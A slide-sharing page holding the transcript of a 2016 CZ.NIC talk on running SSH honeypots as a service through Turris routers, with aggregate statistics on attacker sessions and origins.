Honeypot as a Service Bedřich Košata • bedrich.kosata@nic.cz • 26 May 2016.

Slides:

Advertisements

Similar presentations

Transfer Content to a Website What is FTP? File Transfer Protocol FTP is a protocol – a set of rules Designed to allow files to be transferred across.

Advertisements

How does a network identify computers and transmissions?

Firewalls By Tahaei Fall What is a firewall? a choke point of control and monitoring interconnects networks with differing trust imposes restrictions.

BASIC CRYPTOGRAPHY CONCEPT. Secure Socket Layer (SSL)  SSL was first used by Netscape.  To ensure security of data sent through HTTP, LDAP or POP3.

Honeypot 서울과학기술대학교 Jeilyn Molina Honeypot is the software or set of computers that are intended to attract attackers, pretending to be weak.

Hacking Presented By :KUMAR ANAND SINGH ,ETC/2008.

Presented by Serge Kpan LTEC Network Systems Administration 1.

The Internet Useful Definitions and Concepts About the Internet.

Firewall Raghunathan Srinivasan October 30, 2007 CSE 466/598 Computer Systems Security.

Copyright 2010 Justin C. Klein Keane Using Kojoney Open Source Low Interaction Honeypot to Develop Defensive Strategies and Fingerprint Post-Compromise.

Intrusion Detection using Honeypots Patrick Brannan Honeyd with virtual machines.

Beyond Security Ltd. Port Knocking Beyond Security Noam Rathaus CTO Sunday, July 11, 2004 Presentation on.

Improving Customer Satisfaction Through Advances in Remote Management Technology Greg Michel Product Manager Quintum Technologies Inc.

FIREWALL TECHNOLOGIES Tahani al jehani. Firewall benefits  A firewall functions as a choke point – all traffic in and out must pass through this single.

Chapter 10 Intro to Routing & Switching.  Upon completion of this chapter, you should be able to:  Explain how the functions of the application layer,

Network Management System The Concept –From a central computer, network administrator can manage entire network Collect data Give commands –Moving gradually.

Honeypots. Introduction A honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.0 Application Layer Functionality and Protocols.

CIS 460 – Network Design Seminar Network Security Scanner Tool GFI LANguard.

Honeypot and Intrusion Detection System

VNC Greg Fankhanel Jessica Nunn Jennifer Romero. What is it? Stands for Virtual Network Computing It is remote control software which allows you to view.

1 © 2007 Cisco Systems, Inc. All rights reserved.Cisco Public Remote access typically involves allowing telnet, SSH connections to the router Remote requires.

Internet and Intranet Fundamentals Class 9 Session A.

15-1 Networking Computer network A collection of computing devices that are connected in various ways in order to communicate and share resources.

1Of 25. 2Of 25  Definition  Advantages & Disadvantages  Types  Level of interaction  Honeyd project: A Virtual honeypot framework  Honeynet project:

1 Firewalls G53ACC Chris Greenhalgh. 2 Contents l Attacks l Principles l Simple filters l Full firewall l Books: Comer ch

1 Networking Chapter Distributed Capabilities Communications architectures –Software that supports a group of networked computers Network operating.

A VIRTUAL HONEYPOT FRAMEWORK Author : Niels Provos Publication: Usenix Security Symposium Presenter: Hiral Chhaya for CAP6103.

Application Layer Khondaker Abdullah-Al-Mamun Lecturer, CSE Instructor, CNAP AUST.

1 Figure 4-1: Targeted System Penetration (Break-In Attacks) Host Scanning  Ping often is blocked by firewalls  Send TCP SYN/ACK to generate RST segments.

The Internet Lecture 16 CSCI 1405, CSCI 1301 Introduction to Computer Science Fall 2009.

Networking in Linux. ♦ Introduction A computer network is defined as a number of systems that are connected to each other and exchange information across.

ITGS Network Architecture. ITGS Network architecture –The way computers are logically organized on a network, and the role each takes. Client/server network.

Welcome to Early Bird Class

Protocols Monil Adhikari. Agenda Introduction Port Numbers Non Secure Protocols FTP HTTP Telnet POP3, SMTP Secure Protocols HTTPS.

COSC513 Final Project Firewall in Internet Security Student Name: Jinqi Zhang Student ID: Instructor Name: Dr.Anvari.

Computer Network Architecture Lecture 7: OSI Model Layers Examples II 1 26/12/2012.

Chapter 7: Using Network Clients The Complete Guide To Linux System Administration.

Firewalls. Overview of Firewalls As the name implies, a firewall acts to provide secured access between two networks A firewall may be implemented as.

Chapter 14.  Upon completion of this chapter, you should be able to:  Identify different types of Intrusion Detection Systems and Prevention Systems.

15-1 Networking Computer network A collection of computing devices that are connected in various ways in order to communicate and share resources Usually,

Some Network Commands n Some useful network commands –ping –finger –nslookup –tracert –ipconfig.

Central Management of 300 Firewalls and Access-Lists Fabian Mauchle TNC 2012 Reykjavík, 21-May-2012.

CompTIA Security+ Study Guide (SY0-401)

Application Layer Functionality and Protocols

Network Quality Monitoring System NQMS

Backdoor Attacks.

Authors – Johannes Krupp, Michael Backes, and Christian Rossow(2016)

Click to edit Master subtitle style

Lecture 6: TCP/IP Networking By: Adal Alashban

Introduction to Networking

Data Networking Fundamentals

Client-Server Interaction

CompTIA Security+ Study Guide (SY0-401)

CS222 Web Programming Course Outline

Digital Pacman: Firewall Edition

6. Operating Systems Finger printing & Scanning

I. Basic Network Concepts

Access Control Lists CCNA 2 v3 – Module 11

ISMS Information Security Management System

12/6/2018 Honeypot ICT Infrastructure Sashan

Lecture 6: TCP/IP Networking 1nd semester By: Adal ALashban.

Network hardening Chapter 14.

Introduction to Client/Server Computing

Introduction to Networking & TCP/IP

COMPUTER NETWORKS CS610 Lecture-38 Hammad Khalid Khan.

By Seferash B Asfa Wossen Strayer University 3rd December 2003

EEC4113 Data Communication & Multimedia System Chapter 1: Introduction by Muhazam Mustapha, July 2010.

Computer Networks Protocols

MESSAGE ACCESS AGENT: POP AND IMAP

Presentation transcript:

Honeypot as a Service Bedřich Košata • bedrich.kosata@nic.cz • 26 May 2016

What is a honeypot? Vulnerable machine used for observing attackers' behavior Usually simulated or sand-boxed to prevent actual harm Protocol specific (SSH, Telnet, SMTP, etc.)

Common honeypot pitfalls Small numbers Fixed dedicated IP addresses get to “black-list” with time Imperfect simulation attackers can detect they are in a honeypot It would be great to put HPs on end users' machines

Project Turris 2000 custom routers given to people in Czech Republic Used as a network security probe Users required to have public IPv4 address

Turris as honeypot Offers a large number of instances Geographically and topologically diverse Some IP addresses change from time to time Interesting proof of concept Must not endanger users!

Honeypot as a Service

Honeypot as a Service Used for SSH Runs on a CZ.NIC maintained server User just installs a simple program on the router One port/instance dedicated to each client Centrally maintained and improved helps fight against honeypot detection Logged sessions presented to users and centrally analyzed

SSH honeypot technology - server based on Cowrie written in Python fork of the popular Kippo honeypot extended to support running many instances on different ports available on https://gitlab.labs.nic.cz/turris/cowrie- multiport

SSH honeypot technology - client based on mitmproxy does a man-in-the-middle “attack” on the connection available on https://gitlab.labs.nic.cz/labs/mitmproxy

Hosted SSH honeypot - 2016 Used by about 350 users about 2000 sessions/day, 4 commands/session 36 000 unique IP addresses since Jan 1, 2016

SSH honeypot results - 2016

SSH honeypot results - 2016 13 000 attackers use exactly the same set of commands in the same order over 70 % are from Argentina (mostly Telefonica de Argentina) over 50 % have port 7547 open (DSL provisioning)

Results from SSH honeypot

Results from SSH honeypot

SSH honeypot results - 2016 55,000 wget commands 2,000 unique download URLs 676 unique download IPs

Future plans Will be offered to Turris Omnia users Offer honeypot as a service to the public other routers, servers Move to open data release mode Create clients for common systems Improve data analysis methods Raise awareness of security situation on the Internet

Potential for cooperation Cooperate on honeypot software Install and run independent honeypot services data exchange, debugging Create a federated system of honeypot services run in different countries by different hosts

Thank You Bedřich Košata • bedrich.kosata@nic.cz